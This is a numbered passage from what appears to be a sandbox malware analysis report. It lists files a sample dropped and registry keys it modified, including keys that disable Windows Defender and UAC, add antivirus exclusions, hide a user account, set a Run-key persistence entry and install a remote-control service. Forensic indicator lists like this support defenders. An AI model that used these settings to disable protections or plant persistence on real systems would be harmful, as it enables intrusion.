  2502. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-console-l1-1-0.dll",
  2503. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-datetime-l1-1-0.dll",
  2504. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-debug-l1-1-0.dll",
  2505. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-errorhandling-l1-1-0.dll",
  2506. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l1-1-0.dll",
  2507. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l1-2-0.dll",
  2508. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l2-1-0.dll",
  2509. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-handle-l1-1-0.dll",
  2510. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-heap-l1-1-0.dll",
  2511. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-interlocked-l1-1-0.dll",
  2512. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-libraryloader-l1-1-0.dll",
  2513. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-localization-l1-2-0.dll",
  2514. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-memory-l1-1-0.dll",
  2515. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-namedpipe-l1-1-0.dll",
  2516. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processenvironment-l1-1-0.dll",
  2517. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processthreads-l1-1-0.dll",
  2518. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processthreads-l1-1-1.dll",
  2519. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-profile-l1-1-0.dll",
  2520. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-rtlsupport-l1-1-0.dll",
  2521. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-string-l1-1-0.dll",
  2522. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-synch-l1-1-0.dll",
  2523. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-synch-l1-2-0.dll",
  2524. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-sysinfo-l1-1-0.dll",
  2525. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-timezone-l1-1-0.dll",
  2526. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-util-l1-1-0.dll",
  2527. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-conio-l1-1-0.dll",
  2528. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-convert-l1-1-0.dll",
  2529. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-environment-l1-1-0.dll",
  2530. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-filesystem-l1-1-0.dll",
  2531. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-heap-l1-1-0.dll",
  2532. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-locale-l1-1-0.dll",
  2533. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-math-l1-1-0.dll",
  2534. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-multibyte-l1-1-0.dll",
  2535. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-private-l1-1-0.dll",
  2536. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-process-l1-1-0.dll",
  2537. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-runtime-l1-1-0.dll",
  2538. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-stdio-l1-1-0.dll",
  2539. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-string-l1-1-0.dll",
  2540. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-time-l1-1-0.dll",
  2541. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-utility-l1-1-0.dll",
  2542. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\freebl3.dll",
  2543. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\mozglue.dll",
  2544. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\msvcp140.dll",
  2545. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\nss3.dll",
  2546. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\nssdbm3.dll",
  2547. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\softokn3.dll",
  2548. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\ucrtbase.dll",
  2549. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\vcruntime140.dll",
  2550. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\",
  2551. "C:\\Users\\user\\AppData\\Local\\Temp\\aut8241.tmp",
  2552. "C:\\ProgramData\\Microsoft\\Intel\\__tmp_rar_sfx_access_check_15462125",
  2553. "C:\\Users\\user\\AppData\\Local\\Temp\\aut3AF7.tmp",
  2554. "C:\\Users\\user\\DevManView.exe",
  2555. "C:\\Users\\user\\Volumeid.exe",
  2556. "C:\\Users\\user\\AppData\\Local\\Temp\\aut6936.tmp",
  2557. "C:\\Programdata\\Windowstask\\scaner.dat",
  2558. "C:\\Programdata\\WindowsTask\\scaner.exe",
  2559. "C:\\rdp\\__tmp_rar_sfx_access_check_15465812",
  2560. "C:\\rdp\\run.vbs",
  2561. "C:\\ProgramData\\install\\taskhostw.exe",
  2562. "C:\\Windows\\Tasks\\Adobe Acrobat Update Task.job",
  2563. "C:\\Windows\\sysnative\\Tasks\\Adobe Acrobat Update Task",
  2564. "C:\\Windows\\Tasks\\Adobe Flash Player NPAPI Notifier.job",
  2565. "C:\\Windows\\sysnative\\Tasks\\Adobe Flash Player NPAPI Notifier",
  2566. "C:\\Windows\\Tasks\\GoogleUpdateTaskMachineCore.job",
  2567. "C:\\Windows\\sysnative\\Tasks\\GoogleUpdateTaskMachineCore",
  2568. "C:\\Windows\\Tasks\\GoogleUpdateTaskMachineUA.job",
  2569. "C:\\Windows\\sysnative\\Tasks\\GoogleUpdateTaskMachineUA",
  2570. "C:\\Windows\\SoftwareDistribution\\DataStore\\Logs\\edbtmp.log",
  2571. "C:\\Windows\\sysnative\\Tasks\\OfficeSoftwareProtectionPlatform\\SvcRestartTask",
  2572. "C:\\ProgramData\\RunDLL\\__tmp_rar_sfx_access_check_15714687"
  2573.  
  2574.  
  2575. * Modified Registry Keys:
  2576. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run\\Realtek HD Audio",
  2577. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList",
  2578. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\\John",
  2579. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\\John",
  2580. "HKEY_LOCAL_MACHINE\\SOFTWARE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender",
  2581. "HKEY_LOCAL_MACHINE\\SOFTWARE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\DisableAntiSpyware",
  2582. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\DisableAntiSpyware",
  2583. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection",
  2584. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableIOAVProtection",
  2585. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableBehaviorMonitoring",
  2586. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableOnAccessProtection",
  2587. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableRawWriteNotification",
  2588. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Spynet",
  2589. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Spynet\\DisableBlockAltFirstSeen",
  2590. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Spynet\\LocalSettingOverrideSpynetRepting",
  2591. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Spynet\\SumbitSamplesConsent",
  2592. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Exclusions",
  2593. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Exclusions\\Exclusions_Paths",
  2594. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Exclusions\\Paths",
  2595. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Exclusions\\Paths\\C:\\Programdata",
  2596. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Exclusions\\Paths\\C:\\Windows\\System32",
  2597. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLUA",
  2598. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\ConsentPromptBehaviorAdmin",
  2599. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ImmersiveShell",
  2600. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ImmersiveShell\\UseActionCenterExperience",
  2601. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\ImmersiveShell\\UseActionCenterExperience",
  2602. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\EnableBalloonTips",
  2603. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\disable",
  2604. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\PushNotifications",
  2605. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\PushNotifications\\ToastEnabled",
  2606. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Reporting",
  2607. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Reporting\\DisableEnhancedNotifications",
  2608. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\UX Configuration",
  2609. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\UX Configuration\\Notification_Suppress",
  2610. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",
  2611. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\DisallowRun",
  2612. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\DisallowRun\\1",
  2613. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\DisallowRun\\2",
  2614. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\DisallowRun\\3",
  2615. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\DisallowRun\\4",
  2616. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\DisallowRun\\5",
  2617. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\DisallowRun\\6",
  2618. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\DisallowRun\\7",
  2619. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\DisallowRun\\8",
  2620. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\DisallowRun\\9",
  2621. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\DisallowRun\\10",
  2622. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\DisallowRun\\11",
  2623. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ProxyEnable",
  2624. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ProxyServer",
  2625. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections\\SavedLegacySettings",
  2626. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\UNCAsIntranet",
  2627. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\AutoDetect",
  2628. "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\LanguageList",
  2629. "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\mlang.dll,-4612",
  2630. "HKEY_CURRENT_USER\\Software\\Microsoft\\IAM\\Default LDAP Account",
  2631. "HKEY_CURRENT_USER\\Software\\Microsoft\\IAM\\Server ID",
  2632. "HKEY_LOCAL_MACHINE\\SYSTEM\\Remote Manipulator System",
  2633. "HKEY_LOCAL_MACHINE\\SYSTEM\\Remote Manipulator System\\v4",
  2634. "HKEY_LOCAL_MACHINE\\SYSTEM\\Remote Manipulator System\\v4\\Server",
  2635. "HKEY_LOCAL_MACHINE\\SYSTEM\\Remote Manipulator System\\v4\\Server\\Parameters",
  2636. "HKEY_LOCAL_MACHINE\\SYSTEM\\Remote Manipulator System\\v4\\Server\\Parameters\\InternetId",
  2637. "HKEY_LOCAL_MACHINE\\SYSTEM\\Remote Manipulator System\\v4\\Server\\Parameters\\Options",
  2638. "HKEY_LOCAL_MACHINE\\SYSTEM\\Remote Manipulator System\\v4\\Server\\Parameters\\FUSClientPath",
  2639. "HKEY_LOCAL_MACHINE\\SYSTEM\\Remote Manipulator System\\v4\\Server\\Parameters\\CalendarRecordSettings",
  2640. "HKEY_LOCAL_MACHINE\\SYSTEM\\Remote Manipulator System\\v4\\Server\\Parameters\\UserAccess",
  2641. "HKEY_LOCAL_MACHINE\\SYSTEM\\Remote Manipulator System\\v4\\Server\\Parameters\\notification",
  2642. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\PromptOnSecureDesktop",
  2643. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Exclusions\\Paths\\C:\\programdata",
  2644. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths",
  2645. "HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\Explorer",
  2646. "HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\Explorer\\DisableNotificationCenter",
  2647. "HKEY_LOCAL_MACHINE\\SYSTEM\\Remote Manipulator System\\v4\\Server\\Parameters\\Password",
  2648. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Realtek HD Audio",
  2649. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\ShowSuperHidden",
  2650. "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Tracing\\taskhostw_RASAPI32",
  2651. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Tracing\\taskhostw_RASAPI32\\EnableFileTracing",
  2652. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Tracing\\taskhostw_RASAPI32\\EnableConsoleTracing",
  2653. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Tracing\\taskhostw_RASAPI32\\FileTracingMask",
  2654. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Tracing\\taskhostw_RASAPI32\\ConsoleTracingMask",
  2655. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Tracing\\taskhostw_RASAPI32\\MaxFileSize",
  2656. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Tracing\\taskhostw_RASAPI32\\FileDirectory",
  2657. "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\RManService",
  2658. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\RManService",
  2659. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\RManService\\Type",
  2660. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\RManService\\Start",
  2661. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\RManService\\ErrorControl",
  2662. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\RManService\\ImagePath",
  2663. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\RManService\\DisplayName",
  2664. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\RManService\\WOW64",
  2665. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\RManService\\ObjectName",
  2666. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\RManService\\Description",
  2667. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\AppMgmt\\Type",
  2668. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\AppIDSvc\\Start",
  2669. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\VaultSvc\\Type",
  2670. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\Winmgmt\\Type",
  2671. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\AppMgmt\\Start",
  2672. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\PolicyAgent\\Type",
  2673. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\Browser\\Type",
  2674. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\RManService\\FailureActions",
  2675. "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\dhcpqec.dll,-100",
  2676. "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\dhcpqec.dll,-101",
  2677. "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\dhcpqec.dll,-103",
  2678. "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\dhcpqec.dll,-102",
  2679. "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\napipsec.dll,-1",
  2680. "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\napipsec.dll,-2",
  2681. "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\napipsec.dll,-4",
  2682. "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\napipsec.dll,-3",
  2683. "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\tsgqec.dll,-100",
  2684. "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\tsgqec.dll,-101",
  2685. "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\tsgqec.dll,-102",
  2686. "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\tsgqec.dll,-103",
  2687. "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\eapqec.dll,-100",
  2688. "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\eapqec.dll,-101",
  2689. "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\eapqec.dll,-102",
  2690. "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\eapqec.dll,-103",
  2691. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Print\\BeepEnabled",
  2692. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Print\\Printers\\DefaultSpoolDirectory",
  2693. "HKEY_USERS\\S-1-5-19\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Devices\\Send To OneNote 2013",
  2694. "HKEY_USERS\\S-1-5-19\\Software\\Microsoft\\Windows NT\\CurrentVersion\\PrinterPorts\\Send To OneNote 2013",
  2695. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Ports\\Ne00:",
  2696. "HKEY_USERS\\S-1-5-19\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Devices\\Microsoft XPS Document Writer",
  2697. "HKEY_USERS\\S-1-5-19\\Software\\Microsoft\\Windows NT\\CurrentVersion\\PrinterPorts\\Microsoft XPS Document Writer",
  2698. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Ports\\Ne01:",
  2699. "HKEY_USERS\\S-1-5-19\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Devices\\Fax",
  2700. "HKEY_USERS\\S-1-5-19\\Software\\Microsoft\\Windows NT\\CurrentVersion\\PrinterPorts\\Fax",
  2701. "HKEY_USERS\\S-1-5-20\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Devices\\Send To OneNote 2013",
  2702. "HKEY_USERS\\S-1-5-20\\Software\\Microsoft\\Windows NT\\CurrentVersion\\PrinterPorts\\Send To OneNote 2013",
  2703. "HKEY_USERS\\S-1-5-20\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Devices\\Microsoft XPS Document Writer",
  2704. "HKEY_USERS\\S-1-5-20\\Software\\Microsoft\\Windows NT\\CurrentVersion\\PrinterPorts\\Microsoft XPS Document Writer",
  2705. "HKEY_USERS\\S-1-5-20\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Devices\\Fax",
  2706. "HKEY_USERS\\S-1-5-20\\Software\\Microsoft\\Windows NT\\CurrentVersion\\PrinterPorts\\Fax",
  2707. "HKEY_USERS\\S-1-5-21-0000000000-0000000000-0000000000-1000\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Devices\\Send To OneNote 2013",
  2708. "HKEY_USERS\\S-1-5-21-0000000000-0000000000-0000000000-1000\\Software\\Microsoft\\Windows NT\\CurrentVersion\\PrinterPorts\\Send To OneNote 2013",
  2709. "HKEY_USERS\\S-1-5-21-0000000000-0000000000-0000000000-1000\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Devices\\Microsoft XPS Document Writer",
  2710. "HKEY_USERS\\S-1-5-21-0000000000-0000000000-0000000000-1000\\Software\\Microsoft\\Windows NT\\CurrentVersion\\PrinterPorts\\Microsoft XPS Document Writer",
  2711. "HKEY_USERS\\S-1-5-21-0000000000-0000000000-0000000000-1000\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Devices\\Fax",
  2712. "HKEY_USERS\\S-1-5-21-0000000000-0000000000-0000000000-1000\\Software\\Microsoft\\Windows NT\\CurrentVersion\\PrinterPorts\\Fax",
  2713. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\Microsoft\\Windows\\AppID\\PolicyConverter\\Index",
  2714. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\0A1870FD-5D56-4033-B69F-E1BD5FF7D09A\\Hash",
  2715. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\0A1870FD-5D56-4033-B69F-E1BD5FF7D09A\\Triggers",
  2716. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\Microsoft\\Windows\\AppID\\VerifiedPublisherCertStoreCheck\\Index",
  2717. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\18E94867-91BA-4791-A6F2-C9F987B18808\\Hash",
  2718. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\18E94867-91BA-4791-A6F2-C9F987B18808\\Triggers",
  2719. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\Machine\\Site-Name",
  2720. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\Machine\\Distinguished-Name",
  2721. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\Machine\\SlowLink",
  2722. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\Machine\\GPO-List",
  2723. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\Machine\\GPO-List\\0",
  2724. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\Machine\\GPO-List\\0\\Version",
  2725. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\Machine\\GPO-List\\0\\WQLFilterPass",
  2726. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\Machine\\GPO-List\\0\\AccessDenied",
  2727. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\Machine\\GPO-List\\0\\GPO-Disabled",
  2728. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\Machine\\GPO-List\\0\\Options",
  2729. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\Machine\\GPO-List\\0\\GPOID",
  2730. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\Machine\\GPO-List\\0\\SOM",
  2731. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\Machine\\GPO-List\\0\\DisplayName",
  2732. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\Machine\\GPO-List\\0\\WQL-Id",
  2733. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\Machine\\GPLink-List",
  2734. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\Machine\\GPLink-List\\0",
